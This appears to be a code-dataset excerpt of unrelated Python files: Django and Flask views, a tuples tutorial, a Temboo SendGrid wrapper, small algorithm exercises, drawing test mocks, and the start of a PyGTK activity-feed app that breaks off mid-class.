text stringlengths 38 1.54M |
|---|
#!/usr/local/bin/python
# -*- coding: utf-8 -*-
from django.shortcuts import render, redirect
from django.template.context_processors import csrf
from django.conf import settings
from django.shortcuts import render_to_response
from django.utils import timezone
from django.views.decorators.csrf import csrf_exempt
from .models import mysearch
import os, sys
@csrf_exempt
def post_list(request):
return render(request,'blog/post_list.html',{})
@csrf_exempt
def post_list1(request):
mysearch.objects.create(title=request.GET['title'],content=request.GET['cont'],model_name=request.GET['name'],created_data=request.GET['time'])
posts = mysearch.objects.all()
return render(request,'blog/post_list1.html',{'posts':posts})
def add_record(request):
list=[None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None];
dist = 0
if ('info1' in request.GET):
list[0] = Busstation.objects.all()
if ('info2' in request.GET):
list[1] = Mrtstation.objects.all()
if ('info3' in request.GET):
list[2] = Park.objects.all()
if ('info4' in request.GET):
list[3] = Gost.objects.all()
if ('info5' in request.GET):
list[4] = Sensual.objects.all()
if ('info6' in request.GET):
list[5] = Undertaker.objects.all
if ('info7' in request.GET):
list[6] = Baby.objects.all()
if ('info8' in request.GET):
list[7] = School.objects.all()
if ('info9' in request.GET):
list[8] = Library.objects.all()
if ('info10' in request.GET):
list[9] = Market.objects.all()
if ('info11' in request.GET):
list[10] = Temple.objects.all()
if ('info12' in request.GET):
list[11] = Carburg.objects.all()
if ('info13' in request.GET):
list[12] = Houseurg.objects.all()
if ('info14' in request.GET):
list[13] = Accide.objects.all()
if ('info15' in request.GET):
list[14] = Alley.objects.all()
# if ('info16' in request.GET):
# list[15] = Ychouse.objects.all()
# if ('info17' in request.GET):
# list[18] = Highsoil.objects.all().values('lat','lng').distinct()
if ('info20' in request.GET):
list[19] = Hospital.objects.all()
if ('info24' in request.GET):
dist = 300
if ('info25' in request.GET):
dist = 500
if ('info26' in request.GET):
dist = 1000
address = request.GET['add']
posts = list[0]
post1 = list[1]
post2 = list[2]
post3 = list[3]
post4 = list[4]
post5 = list[5]
post6 = list[6]
post7 = list[7]
post8 = list[8]
post9 = list[9]
post10 = list[10]
post11 = list[11]
post12 = list[12]
post13 = list[13]
post14 = list[14]
post15 = Ychouse.objects.all()
post16 = list[16]
post17 = list[17]
post18 = Highsoil.objects.all().values('lat','lng').distinct()
post19 = list[19]
return render(request,'blog/add_record.html',{'posts':posts,'post1':post1,'post2':post2,'post3':post3,\
'post4':post4,'post5':post5,'post6':post6,'post7':post7,'post8':post8,'post9':post9,'post10':post10,\
'post11':post11,'post12':post12,'post13':post13,'post14':post14,'post15':post15,'post16':post16,\
'post17':post17,'post18':post18,'post19':post19,'address':address,'dist':dist})
def add2_record(request):
block=[None,None,None,None,None,None,None];
check=0
if ('info21' in request.GET):
block[0] = Undertaker.objects.all()
check = 1
if ('info22' in request.GET):
block[1] = Sensual.objects.all()
check = 2
if ('info23' in request.GET):
block[2] = Lowsoil.objects.all().values('lat','lng').distinct()
block[3] = Mediumsoil.objects.all().values('lat','lng').distinct()
block[4] = Highsoil.objects.all().values('lat','lng').distinct()
check = 3
if ('info24' in request.GET):
block[5] = Houseurg.objects.all()
check = 4
if ('info25' in request.GET):
block[6] = Carburg.objects.all()
check = 5
post20 = block[0]
post21 = block[1]
post22 = block[2]
post23 = block[3]
post24 = block[4]
post25 = block[5]
post26 = block[6]
return render(request,'blog/add2_record.html',{'post20':post20,'post21':post21,'post22':post22,'post23':post23,'post24':post24,'post25':post25,'post26':post26,'check':check})
def add3_record(request):
address = request.GET['add']
dist = request.GET['dist']
post11 = Ychouse.objects.all()
return render(request,'blog/add3_record.html',{'post11':post11,'address':address,'dist':dist})
def add4_record(request):
# if ('object' in request.GET):
str = request.GET['object'].split(",")
a = str[0]
b = str[1]
c = str[2]
d = str[3]
post12 = Ychouse.objects.filter(oid__in = [b,c,d])
post13 = Ychouse.objects.get(oid =a)
return render(request,'blog/add4_record.html',{'post12':post12,'post13':post13})
# Create your views here.
# return render(request,'blog/add_record.html',{'posts':posts,'post2':post2,'post3':post3 ,'address':address,'dist':dist}) |
# TUPLES LESSON
# Tuples
# What is a Tuple in Python?
# A Python tuple is a collection type data structure which is immutable bydesign and holds a sequence of heterogeneous elements.
# It functions almost like a Python list but with the following distinctions. Tuples store a fixed set of elements
# and don’t allow changes whereas the list has the provision to update its content. The list uses square brackets
# for opening and closing whereas, and a tuple has got parentheses for the enclosure. A tuple can come quite handy for
# programmers in different situations.
# Python Tuple - Learn with Examples
# Python Tuple Data Structure How to instantiate a Tuple in Python?
# You can create a tuple by placing a sequence of desired elements separated using commas inside a pair of round
# brackets(), i.e., parentheses.
# Please note that you can create a tuple even without using the parentheses.
# Also, the elements of a tuple can be of any valid Python data types ranging from numbers, strings, lists, etc.
# Simple examples to create a tuple with different inputs
# create an empty tuple
py_tuple = ()
print("A blank tuple:", py_tuple)
# create a tuple without using round brackets
py_tuple = 33, 55, 77
print("A tuple set without parenthesis:", py_tuple, "type:", type(py_tuple))
# create a tuple of numbers
py_tuple = (33, 55, 77)
print("A tuple of numbers:", py_tuple)
# create a tuple of mixed numbers
# such as integer, float, imaginary
py_tuple = (33, 3.3, 3 + 3j)
print("A tuple of mixed numbers:", py_tuple)
# create a tuple of mixed data types
# such as numbers, strings, lists
py_tuple = (33, "33", [3, 3])
print("A tuple of mixed data types:", py_tuple)
# create a tuple of tuples
# i.e. a nested tuple
py_tuple = (('x', 'y', 'z'), ('X', 'Y', 'Z'))
print("A tuple of tuples:", py_tuple)
# output
# A blank tuple: ()
# A tuple set without parenthesis: (33, 55, 77)
# #### type: < class 'tuple'>
# A tuple of numbers: (33, 55, 77)
# A tuple of mixed numbers: (33, 3.3, (3 + 3j))
# A tuple of mixed data types: (33, '33', [3, 3])
# A tuple of tuples: (('x', 'y', 'z'), ('X', 'Y', 'Z'))
# Using the built - in function “tuple()” to create a tuple
# We can invoke the tuple function and get the desired result.
# creating a tuple from a set
py_tuple = tuple({33, 55, 77})
type(py_tuple)
# <class 'tuple'>
py_tuple
# (33, 77, 55)
# creating a tuple from a list
py_tuple = tuple([33, 55, 77])
type(py_tuple)
# <class 'tuple'>
py_tuple
# (33, 55, 77)
# Creating a tuple of size one
# Create a tuple with a single element.It’s not as easy to achieve as it looks so.
# A single element surrounded by parenthesis will create a string instead of a tuple
py_tuple = ('single')
type(py_tuple)
# <class 'str'>
# You need to place a comma after the first element to create a tuple of size "one"
py_tuple = ('single',)
type(py_tuple)
# <class 'tuple'>
# You can use a list of one element and convert it to a tuple
py_tuple = tuple(['single'])
type(py_tuple)
# <class 'tuple'>
# You can use a set of one element and convert it to a tuple
py_tuple = tuple({'single'})
type(py_tuple)
# <class 'tuple'>
# How can you access a tuple in Python?
# Python provides various intuitive mechanisms to access a single or a range of elements from a tuple.
# Via Indexing
# The simplest is the direct access method where you use the index operator[] to pick an item from the tuple.
# You can start indexing from the 0th position. It means if a tuple holds ten elements, then the index will begin at 0th
# and will end at 9th position. Violating the boundaries of a tuple will result in an IndexError.
# If the tuple contains other tuples as its elements, then you would need to index the elements tuple-by-tuple.
vowel_tuple = ('a', 'e', 'i', 'o', 'u')
print("The tuple:", vowel_tuple, "Length:", len(vowel_tuple))
# Indexing the first element
print("OP(vowel_tuple[0]):", vowel_tuple[0])
# Indexing the last element
print("OP(vowel_tuple[length-1]):", vowel_tuple[len(vowel_tuple) - 1])
# Indexing a non-existent member
# will raise the IndexError
try:
print(vowel_tuple[len(vowel_tuple) + 1])
except Exception as ex:
print("OP(vowel_tuple[length+1]) Error:", ex)
# Indexing with a non-integer index
# will raise the TypeError
try:
print(vowel_tuple[0.0])
except Exception as ex:
print("OP(vowel_tuple[0.0]) Error:", ex)
# Indexing in a tuple of tuples
t_o_t = (('jan', 'feb', 'mar'), ('sun', 'mon', 'wed'))
# Accessing elements from the first sub tuple
print("OP(t_o_t[0][2]):", t_o_t[0][2])
# Accessing elements from the second sub tuple
print("OP(t_o_t[1][2]):", t_o_t[1][2])
# output
# The tuple: ('a', 'e', 'i', 'o', 'u')
# Length: 5
# OP(vowel_tuple[0]): a
# OP(vowel_tuple[length - 1]): u
# OP(vowel_tuple[length + 1])
# Error: tuple index out of range
# OP(vowel_tuple[0.0])
# Error: tuple indices must be integers or slices, not float
# OP(t_o_t[0][2]): mar
# OP(t_o_t[1][2]): wed
# Via Reverse Indexing
# Python tuple supports reverse indexing, i.e., accessing elements using the(-ve) index values.
# The reverse indexing works in the following manner. The index - 1 represents the last item.
# An index with value - 2 will refer to the second item from the rear end.
vowels = ('a', 'e', 'i', 'o', 'u')
vowels
# ('a', 'e', 'i', 'o', 'u')
vowels[-1]
# 'u'
vowels[-2]
# 'o'
vowels[-5]
# 'a'
# vowels[-6]
# Traceback(most recent call last): File "<pyshell#64>", line 1, in < module > vowels[-6]
# IndexError: tuple index out of range
# Via Slicing Operator
# If you need to access not one but more than one element from a tuple, then Python’s slicing operator can come to use.
# The single colon, i.e., a “:” represents the slicing operator in Python.
weekdays = ('mon', 'tue', 'wed', 'thu', 'fri', 'sat', 'sun')
weekdays
# ('mon', 'tue', 'wed', 'thu', 'fri', 'sat', 'sun')
# accessing elements leaving the first one
weekdays[1:]
# ('tue', 'wed', 'thu', 'fri', 'sat', 'sun')
# accessing elements between the first and fifth positions
# excluding the ones at the first and fifth position
weekdays[1:5]
# ('tue', 'wed', 'thu', 'fri')
# accessing elements after the fifth position
weekdays[5:]
# ('sat', 'sun')
# accessing the first five elements
weekdays[:5]
# ('mon', 'tue', 'wed', 'thu', 'fri')
# accessing elements that appears after
# counting five from the rear end
weekdays[:-5]
# ('mon', 'tue')
# accessing five elements from the rear
weekdays[-5:]
# ('wed', 'thu', 'fri', 'sat', 'sun')
# accessing elements from the start to end
weekdays[:]
# ('mon', 'tue', 'wed', 'thu', 'fri', 'sat', 'sun')
# How to modify / update a tuple in Python?
# Since tuples are immutable, so it seems no way to modify them. Once you assign a set of elements to a tuple,
# Python won’t allow it to change. But, there is a catch, what if the items you set are modifiable.
# If there is such a case, then you can change the elements instead of directly modifying the tuple.
# You can even set a tuple to have different values.
py_tuple = (22, 33, 55, 66, [88, 99])
print("Tuple before modificaton:", py_tuple)
# Let's try to modify py_tuple
# It'll return a TypeError
try:
py_tuple[0] = 11
except Exception as ex:
print("OP(py_tuple[0]) Error:", ex)
# We can change the values of mutable
# elements inside the py_tuple i.e. list
py_tuple[4][0] = 77
py_tuple[4][1] = 88
print("Tuple after modificaton:", py_tuple)
# We can assign a tuple with new data
py_tuple = ('mon', 'tue', 'wed')
print("Tuple after reassignment:", py_tuple)
# output
# Tuple before modificaton: (22, 33, 55, 66, [88, 99])
# OP(py_tuple[0])
# Error: 'tuple' object does not support item assignment
# Tuple after modificaton: (22, 33, 55, 66, [77, 88])
# Tuple after reassignment: ('mon', 'tue', 'wed')
# You can extend the behavior of a tuple by using the + (concatenation) and *(repeat) operators.
# The plus operator helps you join the two distinct tuples.
first_tuple = ('p', 'y', 't')
second_tuple = ('h', 'o', 'n')
full_tuple = first_tuple + second_tuple
full_tuple
# ('p', 'y', 't', 'h', 'o', 'n')
# The star operator helps you repeat the elements in a tuple for a specified number of times.
init_tuple = ("fork",)
fork_tuple = init_tuple * 5
fork_tuple
# ('fork', 'fork', 'fork', 'fork', 'fork')
# How to remove / delete a tuple in Python?
# Immutability of a tuple would again prevent you from deleting it in a Python program.
# While you can’t delete a tuple directly, but here is something which can help.
# The Python’s del keyword can make you delete a tuple.
py_tuple = ('p', 'y', 't', 'h', 'o', 'n')
# you can't delete a particular item from a tuple
try:
del py_tuple[0]
except Exception as ex:
print("OP(del py_tuple[0]) Error:", ex)
# but you can delete a whole tuple
del py_tuple
try:
print(py_tuple)
except Exception as ex:
print("print(py_tuple) => Error:", ex)
# output
# del py_tuple[0] = > Error: 'tuple'
# object doesn't support item deletion
# print(py_tuple) = > Error: name 'py_tuple' is not defined
# Miscellaneous Tuple Operations
# Testing membership in Python tuple
# Just like we did in Python set, here also, the “ in ” keyword will help us exercise the membership test on a tuple.
py_tuple = ('p', 'y', 't', 'h', 'o', 'n')
print("First Test: Does 'p' exist?", 'p' in py_tuple)
# First Test: Does 'p' exist? True
print("Second Test: Does 'z' exist?", 'z' in py_tuple)
# Second Test: Does 'z' exist? False
print("Third Test: Does 'n' exist?", 'n' in py_tuple)
# Third Test: Does 'n' exist? True
print("Last Test: Does 't' not exist?", 't' not in py_tuple)
# Last Test: Does 't' not exist? False
# Traversing in a Python tuple
# You can form a for loop and one by one access all the elements in a tuple.
py_tuple = ('p', 'y', 't', 'h', 'o', 'n')
for item in py_tuple:
print("Item:", item)
#
# Item: p
# Item: y
# Item: t
# Item: h
# Item: o
# Item: n
# Usage of Python Tuples
# Used for grouping data
# The tuple provides a quick way of grouping and arranging data.
# It can help you combine any number of elements into a single unit.
# They can help us representing information in the form of records such as the employee record.
# A tuple allows us to group related information and use it as a single entity.
emp_records = ('john', 'hr', 2010, 'robert', 'account', 2015, 'bill', 'mis', 2018)
emp_records[3]
# 'robert'
# Assign to a tuple
# Python tuple supports a very intuitive feature know as “tuple assignment.”
# It lets us assign a tuple of variables on the left of a statement to initialize from the tuple on the right side.
emp_records = ('john', 'hr', 2010, 'robert', 'account', 2015, 'bill', 'mis', 2018)
(emp_name, emp_dept, emp_join_date) = emp_records[0:3]
emp_name
# 'john'
emp_dept
# 'hr'
emp_join_date
# 2010
# Using tuples in functions as return values
# Usually, aFunctiononlyreturnsonevalue.However, we can introduce a tuple and set it as theReturn Value for the Function.
# It means, we can combine multiple values and store them in a tuple and finally return it.
# It could come quite handy in situations when we want to know the hours, minutes, seconds consumed by a job, or to
# get the counts of different types of accessories or the prices of multiple books written by a particular author.
def square(n1, n2):
return (n1 * n1, n2 * n2)
print(type(square(2, 3)))
# output
# <class 'tuple'>
# Mixed Data Structures in the form of tuples
# Tuples are a type of container which can embed another tuple as an element.
# We call such an object as a nested tuple.
# For example, if we have to maintain employee counts in each department along with their
# names, position, and salaries, the nested tuples can let us do this efficiently.
# employes = [
# ("HR", 2, [('david', 'manager', 100000), ('bruno', 'asst manager', 50000)])
# ("IT", 2, [('kirk', 'team lead', 150000), ('matt', 'engineer', 45000)])
# ("Sales", 2, [('billy', 'sales lead', 250000), ('tom', 'executive', 95000)])
# ] |
# -*- coding: utf-8 -*-
from datetime import datetime
import pika,time,random
from app_demo1.lib.redisConnector import Connector as redisConnector
from app_demo1.config import config as CONFIG
'''
对已创建任务未执行任务进行切片环境匹配检查,有空闲且匹配的环境则发送给对应worker的消息通道
'''
def send_task(self,task,slave):
#发送task到redis
task = {
"id": "taskid123456",
"name": "name123",
"slave": "slave1",
"version": "version001",
"project": "pro1",
"cases": ["suite1", "suite111", "suite2", "suite211", "suite3", "suite311", "suite411", "suite4"]
}
redis = redisConnector()
redis.publish(CONFIG.TASK_TOPIC,task)
def send_task1(self, task, slave):
# 发送任务给空闲slave
connection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))
channel = connection.channel() # 生成管道,在管道里跑不同的队列
# 声明queue
channel.queue_declare(queue='hello1')
slave_task = self.build_task()
channel.basic_publish(exchange='', # 先把数据发给exchange交换器,exchage再发给相应队列
routing_key='hello1', # 向"hello1'队列发数据
body=str(slave_task) # 发的消息
)
connection.close()
if __name__ == '__main__':
while(1):
#循环查询任务数据库中未执行任务,匹配空闲worker执行
time.sleep(2) |
"""
Exercise from: https://www.practicepython.org/exercise/2014/12/14/23-file-overlap.html
Code created by Ruben Jimenez
"""
def filetoIntlist(theFile):
theList = []
with open(theFile,'r') as f:
line = f.readline()
while line:
theList.append(int(line))
line = f.readline()
return theList
def run():
primenum = filetoIntlist('primenumbers.txt')
happynum = filetoIntlist('happynumbers.txt')
overlap = [number for number in primenum if number in happynum]
print(overlap)
if __name__ == "__main__":
run() |
from flask import Flask, make_response
import dadosApiRest
app = Flask(__name__)
@app.route('/getDisciplinasPorPeriodo')
def disciplinas_por_periodo():
response = dadosApiRest.disciplinas_por_periodo()
response = make_response(response)
response.headers['Access-Control-Allow-Origin'] = "*"
return response
@app.route('/getPreRequisito')
def pre_requisitos():
response = dadosApiRest.pre_requisitos()
response = make_response(response)
response.headers['Access-Control-Allow-Origin'] = "*"
return response
@app.route('/getMaioresFrequencias')
def maiores_frequencias():
response = dadosApiRest.maiores_frequencias()
response = make_response(response)
response.headers['Access-Control-Allow-Origin'] = "*"
return response
if __name__ == '__main__':
app.debug = True
app.run(host='0.0.0.0')
|
# -*- coding: utf-8 -*-
###############################################################################
#
# SendMail
# Allows you to send emails.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class SendMail(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the SendMail Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(SendMail, self).__init__(temboo_session, '/Library/SendGrid/WebAPI/Mail/SendMail')
def new_input_set(self):
return SendMailInputSet()
def _make_result_set(self, result, path):
return SendMailResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return SendMailChoreographyExecution(session, exec_id, path)
class SendMailInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the SendMail
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_FileContents(self, value):
"""
Set the value of the FileContents input for this Choreo. ((optional, string) The Base64-encoded contents of the file you want to attach.)
"""
super(SendMailInputSet, self)._set_input('FileContents', value)
def set_APIKey(self, value):
"""
Set the value of the APIKey input for this Choreo. ((required, string) The API Key obtained from SendGrid.)
"""
super(SendMailInputSet, self)._set_input('APIKey', value)
def set_APIUser(self, value):
"""
Set the value of the APIUser input for this Choreo. ((required, string) The username registered with SendGrid.)
"""
super(SendMailInputSet, self)._set_input('APIUser', value)
def set_BCC(self, value):
"""
Set the value of the BCC input for this Choreo. ((optional, string) Enter a BCC recipient. Multiple recipients can also be passed in as an array of email addresses.)
"""
super(SendMailInputSet, self)._set_input('BCC', value)
def set_Date(self, value):
"""
Set the value of the Date input for this Choreo. ((optional, string) The timestamp of the Block records. Enter 1 to return a date in a MySQL timestamp format - YYYY-MM-DD HH:MM:SS)
"""
super(SendMailInputSet, self)._set_input('Date', value)
def set_FileName(self, value):
"""
Set the value of the FileName input for this Choreo. ((optional, string) The name of the file you are attaching to your email.)
"""
super(SendMailInputSet, self)._set_input('FileName', value)
def set_FromName(self, value):
"""
Set the value of the FromName input for this Choreo. ((optional, string) The name to be appended to the from email. For example, your company name, or your name.)
"""
super(SendMailInputSet, self)._set_input('FromName', value)
def set_From(self, value):
"""
Set the value of the From input for this Choreo. ((required, string) The originating email address. Must be from your domain.)
"""
super(SendMailInputSet, self)._set_input('From', value)
def set_HTML(self, value):
"""
Set the value of the HTML input for this Choreo. ((conditional, string) The HTML to be used in the body of your email message. Required unless specifying a plain text body in the Text input.)
"""
super(SendMailInputSet, self)._set_input('HTML', value)
def set_Headers(self, value):
"""
Set the value of the Headers input for this Choreo. ((optional, json) The collection of key/value pairs in JSON format. Each key represents a header name and the value the header value. For example: {"X-Accept-Language": "en", "X-Mailer": "MyApp"})
"""
super(SendMailInputSet, self)._set_input('Headers', value)
def set_ReplyTo(self, value):
"""
Set the value of the ReplyTo input for this Choreo. ((optional, string) The email address to append to the reply-to field of your email.)
"""
super(SendMailInputSet, self)._set_input('ReplyTo', value)
def set_ResponseFormat(self, value):
"""
Set the value of the ResponseFormat input for this Choreo. ((optional, string) The format of the response from SendGrid, in either json, or xml. Default is set to json.)
"""
super(SendMailInputSet, self)._set_input('ResponseFormat', value)
def set_Subject(self, value):
"""
Set the value of the Subject input for this Choreo. ((required, string) The subject of the email message.)
"""
super(SendMailInputSet, self)._set_input('Subject', value)
def set_Text(self, value):
"""
Set the value of the Text input for this Choreo. ((conditional, string) The text of the email message. Required unless providing the message body using the HTML input.)
"""
super(SendMailInputSet, self)._set_input('Text', value)
def set_ToName(self, value):
"""
Set the value of the ToName input for this Choreo. ((optional, string) The name of the email recipient.)
"""
super(SendMailInputSet, self)._set_input('ToName', value)
def set_To(self, value):
"""
Set the value of the To input for this Choreo. ((required, string) The valid recipient email address. Multiple addresses can be entered as elements of an array.)
"""
super(SendMailInputSet, self)._set_input('To', value)
def set_XSMTPAPI(self, value):
"""
Set the value of the XSMTPAPI input for this Choreo. ((optional, json) Must be valid JSON format. See here for additional info: http://docs.sendgrid.com/documentation/api/smtp-api/)
"""
super(SendMailInputSet, self)._set_input('XSMTPAPI', value)
class SendMailResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the SendMail Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. (The response from SendGrid. The format corresponds to the ResponseFormat input. Default is json.)
"""
return self._output.get('Response', None)
class SendMailChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return SendMailResultSet(response, path)
|
import re
lines = open('input.txt').read().replace('\n\n', '\n').split('\n')
accumulator = 0
executed_lines = []
i = 0
while i < len(lines):
if i in executed_lines:
print(accumulator)
break
executed_lines.append(i)
matches = re.match(r'(\S+) ([+-])(\d+)', lines[i])
operation, argument_plus_minus, argument_num = matches.group(1, 2, 3)
argument_num = int(argument_num)
if operation == 'acc':
if argument_plus_minus == '+':
accumulator += argument_num
else:
accumulator -= argument_num
i += 1
if operation == 'jmp':
if argument_plus_minus == '+':
i += argument_num
else:
i -= argument_num
if operation == 'nop':
i += 1
|
# Given an array of size n, find the majority element. The majority element is the element that appears more than ⌊ n/2 ⌋ times.
# You may assume that the array is non-empty and the majority element always exist in the array.
# Example 1:
# Input: [3,2,3]
# Output: 3
# Example 2:
# Input: [2,2,1,1,1,2,2]
# Output: 2
class Solution:
def majorityElement1(self, nums: List[int]) -> int:
dictionary = {}
for num in nums:
dictionary.setdefault(num,0)
dictionary[num] += 1
return max(dictionary, key=dictionary.get)
def majorityElement2(self, nums: List[int]) -> int:
count_majority = len(nums)//2
for num in set(nums):
my_count = nums.count(num)
if my_count>count_majority:
return num |
"""
Sort
Quck Sort - Pivots
Get the first value (current value), itterate through the unsorted list and
place anything that is smaller than the current value to the left of it. Set
this value as a pivot, and then repeat for the next value.
"""
def Quick_Sort_Pivots(array, show):
def Show_Values():
if show == True:
print(array)
continueLoop = True
while continueLoop == True:
Show_Values()
continueLoop = False
for i in range(0, len(array)):
if "P" in array[i]:
continue
elif "P" not in array[i]:
current_value = array[i]
current_value_poss = i
array[current_value_poss] = array[current_value_poss] + "P"
print("Current Value is ", current_value, " at poss: ", current_value_poss)
Show_Values()
break
for x in range(0, len(array)-1):#
if x == current_value_poss:
for y in range(0, len(array)-1):#
if "P" in array[y]:
if array[x][0] > array[y][1]:
print(array[x], " > ", array[y])
continue
elif array[x][0] < array[y][1]:
print(array[x], " insert to poss ", y)
tmp = array[x]
del array[x]
array.insert(y, tmp)
else:
continue
Show_Values()
elif "P" in array[x]:
continue
else:
print("the current value to be sorted amungst pivots is: ", array[x])
for y in range(0, len(array)-1):#
if "P" in array[y]:
if array[x] > array[y][1]:
print(array[x], " > ", array[y])
continue
elif array[x] < array[y][1]:
print(array[x], " insert to poss ", y)
tmp = array[x]
del array[x]
array.insert(y, tmp)
else:
continue
Show_Values()
for i in range(0, len(array)):
if "P" in array[i]:
continue
else:
continueLoop = True
"""
Get the first value (current value)
itterate through the unsorted list
place anything that is smaller than the current to left
Set this value as a pivot
repeat for the next value
"""
arrayInp = input("input an unordered list to search, separated by commas: ")
arrayInp = arrayInp.split(",")
print("Array: \n ", arrayInp)
display = bool(input("Show process? (True/False): "))
print(len(arrayInp))
Quick_Sort_Pivots(arrayInp, display)
"""
elif "P" not in array[i] and array[i] > current_value:
print(array[i], " is bigger than ", current_value)
print("Swap being made at pos ", i, " and poss ", current_value_poss)
tmp = array[i]
del array[i]
array.insert(current_value_poss + 1, tmp)
current_value_poss -= 1
print("current value possition: ", current_value_poss)
Show_Values()
else:
continue
elif "P" not in array[i] and array[i] < current_value:
print(array[i], " is smaller than ", current_value)
print("Swap being made at pos ", i, " and poss ", current_value_poss)
tmp = array[i]
del array[i]
array.insert(current_value_poss, tmp)
current_value_poss += 1
print("current value possition: ", current_value_poss)
Show_Values()
"""
|
from dataclasses import dataclass
@dataclass
class MockLine:
"""
Helper class for testing line drawing.
We don't care if a line is drawn from A->B or B->A and we want the
two cases to be considered equal, so we define this class and
override the __eq__ and __hash__ methods.
"""
p1: tuple
p2: tuple
def __eq__(self, other):
return isinstance(other, MockLine) and \
((self.p1 == other.p1 and self.p2 == other.p2) or
(self.p1 == other.p2 and self.p2 == other.p1))
def __lt__(self, other):
"""
Returns True if self < other, and False otherwise.
We define this so that we can sort lists with MockLines in them.
We want ordering to be the same if p1 and p2 are swapped, so we
sort the points before comparing.
"""
return sorted([self.p1, self.p2]) < sorted([other.p1, other.p2])
def test_mock_line():
"""Sanity check test to make sure that MockLine works"""
l1 = MockLine((1, 2), (3, 4))
l2 = MockLine((3, 4), (1, 2))
l3 = MockLine((1, 2), (4, 5))
l4 = MockLine((1, 2), (0, 10))
assert l1 == l2
assert l1 >= l2
assert l2 >= l1
assert l1 != l3
assert l1 < l3
assert l1 != l4
assert l4 < l1
class MockPainter:
"""
Helper class for testing visualization area painting.
We pass an instance of this class into the `paint` method. Instead
of actually drawing something on the screen, this class just keeps
track of all of the primitives that it's been instructed to render.
"""
def __init__(self):
self.ellipses = []
self.lines = []
self.texts = []
def setPen(self, pen):
pass
def pen(self):
return None
def setFont(self, font):
pass
def drawEllipse(self, center, rx, ry):
self.ellipses.append((center.x(), center.y(), rx, ry))
def drawLine(self, x1, y1, x2, y2):
self.lines.append(MockLine((x1, y1), (x2, y2)))
def drawText(self, x, y, text):
self.texts.append((x, y, text))
def clear(self):
self.ellipses = []
self.lines = []
self.texts = []
|
# Created on 2011-12-08
# implement a (near)real-time feed of user activities, sorta like a
# Facebook Feed or Twitter stream
import pygtk
pygtk.require('2.0')
import gtk, pango, gobject
import os, sys, gc
import datetime
import filecmp
import atexit
from signal import signal, SIGTERM
from pymongo import Connection, ASCENDING, DESCENDING
from pygtk_burrito_utils import *
from BurritoUtils import *
from urlparse import urlparse
from annotation_component import AnnotationComponent
from event_fetcher import *
import source_file_prov_viewer, output_file_prov_viewer
from file_version_manager import FileVersionManager, ONE_SEC
WINDOW_WIDTH = 300
FIVE_SECS = datetime.timedelta(seconds=5)
# use the primary X Window clipboard ...
g_clipboard = gtk.Clipboard(selection="PRIMARY")
# Ugh, kludgy globals ... relies on the fact that BurritoFeed is a
# singleton here ... will break down if this isn't the case :)
diff_left_half = None # type: FileFeedEvent.FileEventDisplay
diff_menu_items = []
# Key: filename
# Value: FileEventDisplay object which is the baseline version to watch for changes
watch_files = {}
# Key: filename
# Value: timestamp of most recent read to this file
file_read_timestamps = {}
# each elt is a FileWriteEvent instance
# Key: filename
# Value: list of FileWriteEvent instances in sorted order
sorted_write_events = {}
# http://stackoverflow.com/questions/69645/take-a-screenshot-via-a-python-script-linux
def save_screenshot(output_filename):
assert output_filename.endswith('.png')
w = gtk.gdk.get_default_root_window()
sz = w.get_size()
pb = gtk.gdk.Pixbuf(gtk.gdk.COLORSPACE_RGB,False,8,sz[0],sz[1])
pb = pb.get_from_drawable(w,w.get_colormap(),0,0,0,0,sz[0],sz[1])
if (pb != None):
pb.save(output_filename, 'png')
# To prevent a gross memory leak:
# http://faq.pygtk.org/index.py?req=show&file=faq08.004.htp
del pb
gc.collect()
else:
print >> sys.stderr, "Failed to save screenshot to", output_filename
# Code taken from: http://stackoverflow.com/questions/1551382/python-user-friendly-time-format
def pretty_date(time=False):
"""
Get a datetime object or a int() Epoch timestamp and return a
pretty string like 'an hour ago', 'Yesterday', '3 months ago',
'just now', etc
"""
from datetime import datetime
now = datetime.now()
if type(time) in (int, long):
diff = now - datetime.fromtimestamp(time)
elif isinstance(time,datetime):
diff = now - time
elif not time:
diff = now - now
else:
assert False, time
second_diff = diff.seconds
day_diff = diff.days
if day_diff < 0:
return ''
if day_diff == 0:
if second_diff < 10:
return "just now"
if second_diff < 60:
return str(second_diff) + " seconds ago"
if second_diff < 120:
return "a minute ago"
if second_diff < 3600:
return str( second_diff / 60 ) + " minutes ago"
if second_diff < 7200:
return "an hour ago"
if second_diff < 86400:
return str( second_diff / 3600 ) + " hours ago"
if day_diff == 1:
return "Yesterday"
if day_diff < 7:
return str(day_diff) + " days ago"
if day_diff < 31:
return str(day_diff/7) + " weeks ago"
if day_diff < 365:
return str(day_diff/30) + " months ago"
return str(day_diff/365) + " years ago"
# iterates in reverse over a list of FeedEvent instances and terminates
# either when the list ends or when an element's timestamp is older
# than target_time
def gen_reverse_bounded_time_elts(lst, target_time):
for e in reversed(lst):
if e.timestamp < target_time:
return
yield e
class FeedEvent:
PANGO_TIMESTAMP_TEMPLATE = '<span font_family="sans" size="8000" foreground="#999999">%s</span>'
def __init__(self, dt, icon_filename):
self.timestamp = dt # type datetime.datetime
event_icon = gtk.Image()
event_icon.set_from_file(icon_filename)
# start empty
timestamp_lalign = gtk.Alignment(0, 0.6, 0, 0)
timestamp_lab = gtk.Label()
timestamp_lalign.add(timestamp_lab)
